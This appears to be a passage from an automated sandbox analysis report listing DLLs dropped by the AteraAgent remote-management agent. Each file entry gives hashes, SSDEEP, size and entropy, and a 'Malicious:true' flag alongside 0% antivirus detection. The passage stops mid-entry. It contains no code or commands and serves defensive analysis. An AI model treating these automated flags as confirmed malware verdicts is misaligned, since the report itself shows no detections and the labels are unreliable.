                                                                                                                                                                                                                                        SHA-256:23EE1A91AED2309099858E2E11EC499AD3AD4532E70E0B095DF2CFA118BAA85C
                                                                                                                                                                                                                                        SHA-512:0B775138E8653240D7DD888F6CBE4EFAA9BD7762887D3C9D64F4FC180F41703D8286DEE63B2D09314E8CB98B319C5FB2C9DD1739CE3F207AFA1AD9C3331F29F6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59472
                                                                                                                                                                                                                                        Entropy (8bit):6.334054400696551
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:t7WAluzJ+Je2PS7kJFT+OUjz+Tf26auuPF1/krd6zkwQRIOIzb7EFEpYinAMxC6z:xJ4V26g1YuuP/2IOe/7Hxp
                                                                                                                                                                                                                                        MD5:5C0ECE8A6364AD65C5D01B762D721F40
                                                                                                                                                                                                                                        SHA1:2CEF9284C94A608269D581A4588E81E485378F3E
                                                                                                                                                                                                                                        SHA-256:A5B60A7BAAA84EA94FEF8704737B6845823A2C1DA0B9F95240CFC61C341FA2FB
                                                                                                                                                                                                                                        SHA-512:E327BF974B9E909C147E67643A7A972F11C2BC3466B622A2286C3E9C0AF003E333A392090314D850DFFB60CE35B05441C8373D9EADEAB4EFFADC9032F2B98566
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21072
                                                                                                                                                                                                                                        Entropy (8bit):6.659500044238884
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:UzhlvlfTcbY3SCkWJOVMWs4Nyb8E9VF6IYinAM+oC2aJ8f09:KrfTcbY+uwEpYinAMxCTY2
                                                                                                                                                                                                                                        MD5:DE75610B9B79DB4EE9FF93D756E16D4D
                                                                                                                                                                                                                                        SHA1:2B3BBC1AF7191893FC42A450280ECAD9A5C68FE4
                                                                                                                                                                                                                                        SHA-256:4C036AF950DA497F34F9E325F84A5502DE8AB373559FEE971DACA0AA6C791248
                                                                                                                                                                                                                                        SHA-512:B9CBE72BCA53564FF77C8B02598190966290DF010902114CB7FF91E6831F87B8833984AA2F2E42F9870A28919A32C9C4B4A7A14901E36272F4EA1029C9C06A65
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26192
                                                                                                                                                                                                                                        Entropy (8bit):6.6410774484512896
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:T3WWQsE/8iqjnqHTnBdOHFgYVwOU3NW2qFWs/GNyb8E9VF6IYinAM+oCUo0eD05:T3hQsE/8irTnfYFr//OEpYinAMxC1ny
                                                                                                                                                                                                                                        MD5:F07B5825DE2EFB3133BBF61FA2A4CB76
                                                                                                                                                                                                                                        SHA1:B6CC2BE8845C0774E932B2DB1FBCAF788BFBEA9C
                                                                                                                                                                                                                                        SHA-256:A4EEE595F17C9F26EB0DC6694580DD5873938DEF495C524EFFB0D82BC3F4262B
                                                                                                                                                                                                                                        SHA-512:F24E824FE41280C9BC170D9DD1016EFC236650E7762EB115DE02B9593BDBD1649FDE1FCF9B7D387C533AA6BF9651B5AF701ABDD10D2D4B1BB072EBAB1B594DF4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35408
                                                                                                                                                                                                                                        Entropy (8bit):6.577511960397023
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6oi0m9/A58Ph+mJ5fvIK0ixTryfCWo/zKeGmquanccOB30RtWW3aUWspNyb8E9V3:KDhbJ5nR02TQCWoJ92tEpYinAMxCtm
                                                                                                                                                                                                                                        MD5:6628C561065DF3B10639846B7F7DC3C3
                                                                                                                                                                                                                                        SHA1:ACBE77E78C99E86866870874A2311DCF4902BAA5
                                                                                                                                                                                                                                        SHA-256:9996C340E4E83C44110028CB28F20E9B24EB126742409FA718F90EA2A16379B2
                                                                                                                                                                                                                                        SHA-512:DB9BC520D226A1E702DAFB2F2F6E0064984854844AE214F52BAB27E9A8B39F9A5AAFF9BE87BE79FA4C5E4B9D134098AE0B72C424D09E057D1B02A75E79C9F810
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):48208
                                                                                                                                                                                                                                        Entropy (8bit):6.412254540457386
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:q7d427HfKy1DQ+SKKKKzqPo6Zkn2qZKqLzZdd0UFxlEpYinAMxCp7VCb:q7d42LfKy3SKKKKr8keqBdd0UFE7Hx0a
                                                                                                                                                                                                                                        MD5:02D75B740B732B9D45BE1C9DEEE82D52
                                                                                                                                                                                                                                        SHA1:145DE3697B7BCCF7F39EF5C1B813F9A213664017
                                                                                                                                                                                                                                        SHA-256:D56BEB31BC6BCF54AE02721D3CE2B6F42D7783483B67DB2B11E5C56E8A29EC38
                                                                                                                                                                                                                                        SHA-512:0E6041D18D62FFBBE4B9906931322F5B3856C462A330922C6264CE99E983811CF139AA52A9C10618AE8035B85B929CBAA3F0DF6FF12D29B9E269E9945C1EB232
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24144
                                                                                                                                                                                                                                        Entropy (8bit):6.63064410442664
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:by1x30dJaeTP8pBT7xe3SUDtzWzK0WswNyb8E9VF6IYinAM+oC61mx4iw:bq/eTeABdWIEpYinAMxCa24x
                                                                                                                                                                                                                                        MD5:D73F1C9FDCAA14AA98AD1D62EB4F61E8
                                                                                                                                                                                                                                        SHA1:25180ED081DBAB955DB2E321A42820313FCAC737
                                                                                                                                                                                                                                        SHA-256:5AB6AF65EAAA7BD38B13C2E0A184D241530FD113B6DB218AD6D138A1DCA327E2
                                                                                                                                                                                                                                        SHA-512:35E80F9F724BE46786ABDCC77BA6C4E1065A41F4213ED1B8D25B37C6CF61B7706A5F9AA87A1C5A74C96BC3D2454968541C424D6D1D4B15A64867191A190CFFB4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61520
                                                                                                                                                                                                                                        Entropy (8bit):6.349315131405323
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:1g+uGuV+1mb5JtoNIHQs1YyH67beAn9eLfLaV7CvS4vEpYinAMxCkMq:1g+uGuV+1mbaqvy9OfLKMS4I7Hx8q
                                                                                                                                                                                                                                        MD5:64A1C30750E208D114638514140D2FD8
                                                                                                                                                                                                                                        SHA1:98F1BFAE55DE97059C7BC6A53FC6F8254C6A9EB7
                                                                                                                                                                                                                                        SHA-256:E329AF9E6DA9753A31B9908BD6F4655C646C20C088589AF9477515D37F73190B
                                                                                                                                                                                                                                        SHA-512:450FEF2F9C1712CAF22502C9906582EC6DB6D8F6675CFDC78D96BAFF5154675CF52B4A278306FCAD4A231C7E266B8F7690A6FBE23A8DD9455AE0B8FCEDC5505B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):42576
                                                                                                                                                                                                                                        Entropy (8bit):6.373492302570736
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:TKsIwjxNp8hpwVeEfHuX1QUIh3kOP7oIyWb3jec/uiCR9Crw/EpYinAMxC2xD:bd8hMfHuXbIkOP7ym3jZ/uiCRgrd7HxF
                                                                                                                                                                                                                                        MD5:25CEB30BC69DC05B69F45F672AC1C1A4
                                                                                                                                                                                                                                        SHA1:63A1CC9B52CD8995EA1C17794D2F75E6F5E0B6E9
                                                                                                                                                                                                                                        SHA-256:EA390CC64028A77BA72653504499E9C0B131770DABD23D9E4AC099677B35315F
                                                                                                                                                                                                                                        SHA-512:0D6780C9B883D555BBDC25E08FAE14EBA3583484B1BBD366188CD9350EECD81B4A3433054872F81EC6B361EA794BC2A217F1A92D4ADE9A83182F7F2B4B9DEF9A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):345168
                                                                                                                                                                                                                                        Entropy (8bit):6.142154867122924
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:1pc1zjTFIfqAnI7FZVllnuJxKrSj8r2yQQLeBLPHGUdlWOAlMoBJR1TaKwQz8weI:MpTCqAn+fnw5h9hdls+IZTWcd
                                                                                                                                                                                                                                        MD5:E20A8D1854150A56856901090B816B6C
                                                                                                                                                                                                                                        SHA1:1F2C25FD9435D137ECEB81B2A74FEE6CBCEAD01A
                                                                                                                                                                                                                                        SHA-256:6D3F41537D09414352E42874430E3D44A8508F6FE843E52F124DBC279E76ECDD
                                                                                                                                                                                                                                        SHA-512:747A5B2C315E26558F99436B463DD766AD0E99F527A7836055CF5898FD7BE649ED8AC5613148D80F39AF068C2F556463CAE9A242939948F110A8A517E705B3A7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710736
                                                                                                                                                                                                                                        Entropy (8bit):5.954282787995899
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:/FIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDMQ:9zMTMNNd+g5Wk78GBBjgrIQtDX
                                                                                                                                                                                                                                        MD5:35FF6C65698485C13B0796ACA1E1E860
                                                                                                                                                                                                                                        SHA1:64C4DBCBFB0C81F34E3E8C5552A9B6626C740F50
                                                                                                                                                                                                                                        SHA-256:683039C3676D8437E99C0A98FB8D4C4D2D47258DAECD897F1532640B2FA82407
                                                                                                                                                                                                                                        SHA-512:E21CFF5489A6D141CE72D4639F5BCB23F18155EBD64347BD179146D53D4E99285D39E3A1B9483C697D73925B76E56E2AEAE5F63D3BB5C8E9C5B65BCC826F78BB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):285776
                                                                                                                                                                                                                                        Entropy (8bit):6.198879246365342
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:QMiAQB4wmESyxV8pj06e4isQ8gsHsjb/W1DBZ7DhsNcyZ:QMZpj06vUsMjbQ77D+B
                                                                                                                                                                                                                                        MD5:40F70FD9AA352F6954C048396533A13F
                                                                                                                                                                                                                                        SHA1:B5CACB14C795B8F03CA62A2FABA9032FAA5C5A62
                                                                                                                                                                                                                                        SHA-256:135C5B3FC4A3307FB373D466D8E0993F5899AD725AA3A04433D4CB22E205A1D0
                                                                                                                                                                                                                                        SHA-512:6AD391AD6603C4CA8A168B31968FD9DCC467D23E38A93FD616F5DF38F00A0B4152E6AA9166C37D63D96C32FEAE01DC15709F7E7F2BE37CEE3CA18F063B69EE02
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):38992
                                                                                                                                                                                                                                        Entropy (8bit):6.2961633461406645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:vdfuvOXFXW/8O6bXD+eeIgLPRsnHnyhQupytM9z7O3zfXYvj8rbPH5nTLhCPsIlc:vxuJRRsnHnyhQupytM9z7O3zfXYvj8rb
                                                                                                                                                                                                                                        MD5:318DB17FA7B98E18B6C3A6A139341D51
                                                                                                                                                                                                                                        SHA1:CF98D3D9E98D198D8E30D221EF9ADA5441A88B5E
                                                                                                                                                                                                                                        SHA-256:4D3114B2CF333C56CFAB3CD9CA3C0C16571D337B7E5EBFE72BCDA5C6BCE49E6A
                                                                                                                                                                                                                                        SHA-512:8CD7EE526136FDD48AA900193F2A3A9B0B371569D5ECD21ADF1E57A88DF275579C2C42FEC9B48549C505A605FED016696377FB5B80261EBF36706F818F9C0232
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27728
                                                                                                                                                                                                                                        Entropy (8bit):6.552984475987511
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:iSgpZUlMxR5I1z8w3Uta2lQBVMxzMJktYm+9HWXCYBNyb8E9VF6IYinAM+oCKtKL:iSCZUl2O1zCnXyzD6EpYinAMxCk/kp
                                                                                                                                                                                                                                        MD5:DB2C92A173A2A0373A1F8190E95FA17F
                                                                                                                                                                                                                                        SHA1:FE61CB7B6B8E90E438F17A58775F3A70235744CA
                                                                                                                                                                                                                                        SHA-256:DD3547F40D823D6B0462C9C11CFAEDF306E01782BF28AEA9B0C31DF6812D7E81
                                                                                                                                                                                                                                        SHA-512:66BE8021026769C4509577F77650DD4D20C50EBDC6111342AB91A0C590118E5288B5524E6AF104B1505602231B3B14830E318563FA83F1F1D13C9F06CDEAE86D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41552
                                                                                                                                                                                                                                        Entropy (8bit):6.321380010408937
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:MUqoXsEgfFHoiikZ9y3BHdD+XR/tGo06BWEpYinAMxCD:jLrgfPw3mXREaX7Hxc
                                                                                                                                                                                                                                        MD5:680AFEE0D0AE8CBE3C14E8B2E98331A0
                                                                                                                                                                                                                                        SHA1:A4536CA35F55179DCFAF8507D8BED284F8A87285
                                                                                                                                                                                                                                        SHA-256:9BECD7633640CCA28369CE850BE2F2EB7F3D41B32289D7E4D99FD53E014844F5
                                                                                                                                                                                                                                        SHA-512:586B4D5AB7274E0BBD26CA7B6A08A39D83CCA6B134523342094F0159E42873AF987908DAF52B7947402288E7C399C78EB63658C3591C708A24B7270936B16F5C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138320
                                                                                                                                                                                                                                        Entropy (8bit):6.160416546932122
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:cobKO7RaoWuUeZk/f0Sh1HlWZm1ZZTdyGFkNUMT+P65jDtYQn:JbKKz1UeZk/Phv8lDuPaf
                                                                                                                                                                                                                                        MD5:347415351ACC3FA1BB4B12FE70D8DB3E
                                                                                                                                                                                                                                        SHA1:CD659D48CA294880D2A950521869E3629B680873
                                                                                                                                                                                                                                        SHA-256:72A60990CB728C500FEDB1A6BC89D8EDF4661C89FBE3B899A7D8B2674C59CA1C
                                                                                                                                                                                                                                        SHA-512:CB8EE748F5604EB81299B48B8C0225B1C9FB557472112CB576304E6A52BDF4343BF28F1169E4B60C60357D26910004012D136997C165E226E1B5FECDC397F878
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):150096
                                                                                                                                                                                                                                        Entropy (8bit):6.238069789487319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c0B07tjJYVNSCn+tn3nUMI000000I+49U2BL1krvm:v07iSqSnkMDjyC
                                                                                                                                                                                                                                        MD5:06740FA9E73A184DCEF81A0F9964BC0B
                                                                                                                                                                                                                                        SHA1:E0D18EFACEE6AA0431EFBA2ABD4F0BB34E47BB41
                                                                                                                                                                                                                                        SHA-256:91A4499366A332F2EA2EAAF8CCB1B67582553E8ADF067DE6D3FDC4D8B4389071
                                                                                                                                                                                                                                        SHA-512:B021F4ACDF88EB321981278F8F38D385D200227C975C3A289B2D1BB2D948C5336B78196119B07CCE8C6312926F9F1DE07CB5D0A8D4ADF979C664C8B8A25CB805
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52816
                                                                                                                                                                                                                                        Entropy (8bit):6.18197692498772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NtgEqel7clEfRWOuDXaVIWb0TadZjirgFDrGfmAXOaYbMlfEpYinAMxCr:NiprEfsOuD0hhji6DrLbAY7Hxk
                                                                                                                                                                                                                                        MD5:161E234AD2B220206DB6341B670DBD06
                                                                                                                                                                                                                                        SHA1:B5EAA6BE5BE77227139F2298312A406EC959ADBD
                                                                                                                                                                                                                                        SHA-256:DF6ABCE21AEDCF0106303877C88F0039C52BB5C5B98B537D9C079874965E9875
                                                                                                                                                                                                                                        SHA-512:4999FC5AE69EF904460794C33D9E5642ED2E47A4104C6DC3CF958DC524159F59D3335547BCA5EFB182D87773124BC6E35C524B2488CE0EEBA351BE5FAF3DC5C4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34896
                                                                                                                                                                                                                                        Entropy (8bit):6.290935546349103
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:K3wGplLcGsTK/lWNVz7MW+N92D1NlteVXEpYinAMxCwU:K3wMZ1lWL7MW+N0peVQ7HxRU
                                                                                                                                                                                                                                        MD5:7D9DF905042D334B4A966BD1AA8FB08B
                                                                                                                                                                                                                                        SHA1:3ECC8AD781DB2F3A01C09993BE7D31A878AF4105
                                                                                                                                                                                                                                        SHA-256:7C6F7FF7350CDAD1F7025CB1B0FFADBCA99F801C7D0B9C2F11F5A9AE2F2E53A7
                                                                                                                                                                                                                                        SHA-512:BF17D7A918469726B0325AE2BB35C00D1D5BF3BDA73FDF0397A432F271630A4CCEC2B4A30A677697F1E34AAE81D8FB37A076581C8B78C35B28141AE5ABFEE53D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):71248
                                                                                                                                                                                                                                        Entropy (8bit):6.13173802618335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:pQuedlunqpC9yYxC9P7tt08eeykGlsESo3+7Hxr:g3KICHxC9ZJexRsG3+x
                                                                                                                                                                                                                                        MD5:F85B82A5B08CCAA5359DF86C5A7EAF68
                                                                                                                                                                                                                                        SHA1:6CA8520D247CF38F1D885B987B77892CC94397F6
                                                                                                                                                                                                                                        SHA-256:EF4402FA640506310B85D639DFB2848DBA25DC9AFA331088F8EFB7F0877EE8C8
                                                                                                                                                                                                                                        SHA-512:ADAD4A9E3BC20726986FBA733EA1C2A3490E1C15A92E339A4E0F187EBF0BABFB598F02CEFBB9F54A50343150E365F0D47B31A06054864D8C48ECD5F58445E31A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):543312
                                                                                                                                                                                                                                        Entropy (8bit):5.987161302939433
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:a6+HbUMHVgQO61+5ZpvsQ60OghEusa4UQgce0x7KjF76pkLzLFEnJEIfibgPKiU5:a6aRgsgfEU4UDcxkLzJEBsgPKiUYFHsv
                                                                                                                                                                                                                                        MD5:76B3958BBDDF8E1A58B08581EB4B5CC2
                                                                                                                                                                                                                                        SHA1:B51FFBD175BF70D20C4184FEF53764966DAB2393
                                                                                                                                                                                                                                        SHA-256:0C13A1B28BAFB47ADB5D8B9E86923116258CB4E4CCB3C84310B360D4D004C145
                                                                                                                                                                                                                                        SHA-512:7B43FA7B09C19B01E96B94028EF9EBE4CF44339437A517011702239BA247189F0D3EE8449E6913F82A41E86BA7E80CDFC9ADA9E7DE5423A38F0DBC434725588E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9728
                                                                                                                                                                                                                                        Entropy (8bit):4.560006548424685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:AiWWNv/jzSENtqcadVl8PandjJUf7ZJSqSi/ufPU1S5rxg0XWr:v1Nvb5adVl8P2djJMZJSGu3z5rxg0XWr
                                                                                                                                                                                                                                        MD5:63E9B310597AC25A1CEAA55B6F0CC9F3
                                                                                                                                                                                                                                        SHA1:0C5B170ABA511F479E593727CF7F562523EA7E8C
                                                                                                                                                                                                                                        SHA-256:96B51BB87A1F4072D10B774FFADF81AF93881900571D21FE638E10E3FB0220B8
                                                                                                                                                                                                                                        SHA-512:3BAF3836F8F42DF2D3444409115A3564B0961CD3141CC46E248E6E29A59EC773E511477D8DED4BE05125F2F45E987FD6F94AC5676C318A728B7CA63EB78E9056
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                        Entropy (8bit):4.43329064965383
